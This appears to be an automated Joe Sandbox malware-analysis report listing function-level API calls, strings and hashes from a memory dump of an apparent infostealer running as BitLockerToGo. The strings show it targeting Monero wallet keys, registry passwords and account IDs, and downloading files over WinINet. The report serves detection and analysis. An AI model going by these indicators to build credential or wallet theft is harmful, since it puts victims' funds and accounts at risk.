                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                                                                                                                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                • API String ID: 3885987321-218353709
                                                                                                                                                                • Opcode ID: 16fe17e15cf90d6ef20c161ff5732733f202542b60886b3f9db9cae7e28e5e22
                                                                                                                                                                • Instruction ID: 622db946d734bf91fded8eb02cacdf1a4becd55b6f5441fed8056af59e742c0f
                                                                                                                                                                • Opcode Fuzzy Hash: 16fe17e15cf90d6ef20c161ff5732733f202542b60886b3f9db9cae7e28e5e22
                                                                                                                                                                • Instruction Fuzzy Hash: 8D5177B5E522189BDB15FB60DD94FED733CAF94200F404198A60A6A081EF705B9ACFA5
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 030072D0: memset.MSVCRT ref: 03007314
                                                                                                                                                                  • Part of subcall function 030072D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,03007C90), ref: 0300733A
                                                                                                                                                                  • Part of subcall function 030072D0: RegEnumValueA.ADVAPI32(03007C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 030073B1
                                                                                                                                                                  • Part of subcall function 030072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0300740D
                                                                                                                                                                  • Part of subcall function 030072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,03007C90,80000001,030161C4,?,?,?,?,?,03007C90,?), ref: 03007452
                                                                                                                                                                  • Part of subcall function 030072D0: HeapFree.KERNEL32(00000000,?,?,?,?,03007C90,80000001,030161C4,?,?,?,?,?,03007C90,?), ref: 03007459
                                                                                                                                                                • lstrcat.KERNEL32(35851020,030217FC), ref: 03007606
                                                                                                                                                                • lstrcat.KERNEL32(35851020,00000000), ref: 03007648
                                                                                                                                                                • lstrcat.KERNEL32(35851020, : ), ref: 0300765A
                                                                                                                                                                • lstrcat.KERNEL32(35851020,00000000), ref: 0300768F
                                                                                                                                                                • lstrcat.KERNEL32(35851020,03021804), ref: 030076A0
                                                                                                                                                                • lstrcat.KERNEL32(35851020,00000000), ref: 030076D3
                                                                                                                                                                • lstrcat.KERNEL32(35851020,03021808), ref: 030076ED
                                                                                                                                                                • task.LIBCPMTD ref: 030076FB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                                                • String ID: :
                                                                                                                                                                • API String ID: 3191641157-3653984579
                                                                                                                                                                • Opcode ID: 8d78f00c7a2a17958c1c17b54259fc3aec491349395e6439bb29d12976c227b7
                                                                                                                                                                • Instruction ID: 9c72c1ef7499f061a70ec3184acaf5d2b7680ebb75ca63f82184f726914beb08
                                                                                                                                                                • Opcode Fuzzy Hash: 8d78f00c7a2a17958c1c17b54259fc3aec491349395e6439bb29d12976c227b7
                                                                                                                                                                • Instruction Fuzzy Hash: A9311279942609DFDB04FBE8EC98DFE7779FB88701F108518E102AB284DB34A946CB50
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 03007314
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,03007C90), ref: 0300733A
                                                                                                                                                                • RegEnumValueA.ADVAPI32(03007C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 030073B1
                                                                                                                                                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0300740D
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,03007C90,80000001,030161C4,?,?,?,?,?,03007C90,?), ref: 03007452
                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,03007C90,80000001,030161C4,?,?,?,?,?,03007C90,?), ref: 03007459
                                                                                                                                                                  • Part of subcall function 03009240: vsprintf_s.MSVCRT ref: 0300925B
                                                                                                                                                                • task.LIBCPMTD ref: 03007555
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                                • String ID: Password
                                                                                                                                                                • API String ID: 2698061284-3434357891
                                                                                                                                                                • Opcode ID: 0865515676e9efcef9ed1a5a15e35dce1ca5b0f138fffab9bbf8dcf65a7b65ba
                                                                                                                                                                • Instruction ID: 8f89c0856a33dc26e1fb937a73baf6b540941d5e47b4e302d318ca857177ff60
                                                                                                                                                                • Opcode Fuzzy Hash: 0865515676e9efcef9ed1a5a15e35dce1ca5b0f138fffab9bbf8dcf65a7b65ba
                                                                                                                                                                • Instruction Fuzzy Hash: FF613FB590126C9BEB24DB50DD44BDEB7BCBF44700F0081E9E689AA185DBB46BC5CF90
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 03017542
                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0301757F
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 03017603
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 0301760A
                                                                                                                                                                • wsprintfA.USER32 ref: 03017640
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                • String ID: :$C$\
                                                                                                                                                                • API String ID: 1544550907-3809124531
                                                                                                                                                                • Opcode ID: 6d0c35c832915b3ff0150f4c67616605f653501574f7d31594df16de58377466
                                                                                                                                                                • Instruction ID: d5e11a0a32162399e5e432ab8457d383bd169be3e76c21952bb6af06b6267975
                                                                                                                                                                • Opcode Fuzzy Hash: 6d0c35c832915b3ff0150f4c67616605f653501574f7d31594df16de58377466
                                                                                                                                                                • Instruction Fuzzy Hash: E5419FB5D41348ABDB10DF94DC88BEEBBB8EF48704F004098F5096B280D774AB54CBA5
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,03555F10,00000000,?,03020E2C,00000000,?,00000000), ref: 03018130
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 03018137
                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 03018158
                                                                                                                                                                • __aulldiv.LIBCMT ref: 03018172
                                                                                                                                                                • __aulldiv.LIBCMT ref: 03018180
                                                                                                                                                                • wsprintfA.USER32 ref: 030181AC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                • String ID: %d MB$@
                                                                                                                                                                • API String ID: 2774356765-3474575989
                                                                                                                                                                • Opcode ID: 2e994ac6bd63ddc2e5ab8bd573bb2c5b8cf64ee3dbd9508fcb41441fe6628007
                                                                                                                                                                • Instruction ID: 0bcf428e438c5a2a05856f018c0595376d531cfc3a8b2954185eecd856172946
                                                                                                                                                                • Opcode Fuzzy Hash: 2e994ac6bd63ddc2e5ab8bd573bb2c5b8cf64ee3dbd9508fcb41441fe6628007
                                                                                                                                                                • Instruction Fuzzy Hash: A7211DB1E45318ABDB00DFD8DC49FAEB7B8FB44B14F108609F615BB284D77869008BA5
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 030047EA
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03004801
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03004818
                                                                                                                                                                  • Part of subcall function 030047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 03004839
                                                                                                                                                                  • Part of subcall function 030047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 03004849
                                                                                                                                                                • InternetOpenA.WININET(03020DF7,00000001,00000000,00000000,00000000), ref: 0300610F
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03554CA0), ref: 03006147
                                                                                                                                                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0300618F
                                                                                                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 030061B3
                                                                                                                                                                • InternetReadFile.WININET(03012B61,?,00000400,?), ref: 030061DC
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0300620A
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000400), ref: 03006249
                                                                                                                                                                • InternetCloseHandle.WININET(03012B61), ref: 03006253
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 03006260
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4287319946-0
                                                                                                                                                                • Opcode ID: a11b519ba27d28d2cd9d5f34dfb90aa3b5e1425fdda4ad1eeb891eff87b90058
                                                                                                                                                                • Instruction ID: efc4d3d66f8e7ee6d2e7d35744c14f0081378ee97c7b634f3374a5f2ea18abb5
                                                                                                                                                                • Opcode Fuzzy Hash: a11b519ba27d28d2cd9d5f34dfb90aa3b5e1425fdda4ad1eeb891eff87b90058
                                                                                                                                                                • Instruction Fuzzy Hash: 6A5163B5A4121CABEB20EF50DD49BEE77B9FB44701F008098E605AB1C0DB756B99CF94
                                                                                                                                                                APIs
                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 030170DE
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,0301730D,030205BD), ref: 0301711C
                                                                                                                                                                • memset.MSVCRT ref: 0301716A
                                                                                                                                                                • ??_V@YAXPAX@Z.MSVCRT(?), ref: 030172BE
                                                                                                                                                                Strings
                                                                                                                                                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0301718C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: OpenProcesslstrcpymemset
                                                                                                                                                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                                                                                • API String ID: 224852652-4138519520
                                                                                                                                                                • Opcode ID: 7d07c20bc942f6a30969b1fa14942e7d6cc9e7291b533834052a3a3f836d4979
                                                                                                                                                                • Instruction ID: d8a078e55adf1692d4822f6dcdf6965bd87de2ae884a5f04299643079aa9fab3
                                                                                                                                                                • Opcode Fuzzy Hash: 7d07c20bc942f6a30969b1fa14942e7d6cc9e7291b533834052a3a3f836d4979
                                                                                                                                                                • Instruction Fuzzy Hash: 6051C0B4D023189FDB64EB94CC84BEEF7B4AF44704F1440A8E605BB180EB746A99CF58
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 03009E10: memcmp.MSVCRT(?,v20,00000003), ref: 03009E2D
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300BC9F
                                                                                                                                                                  • Part of subcall function 03018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 03018E52
                                                                                                                                                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 0300BCCD
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300BDA5
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300BDB9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
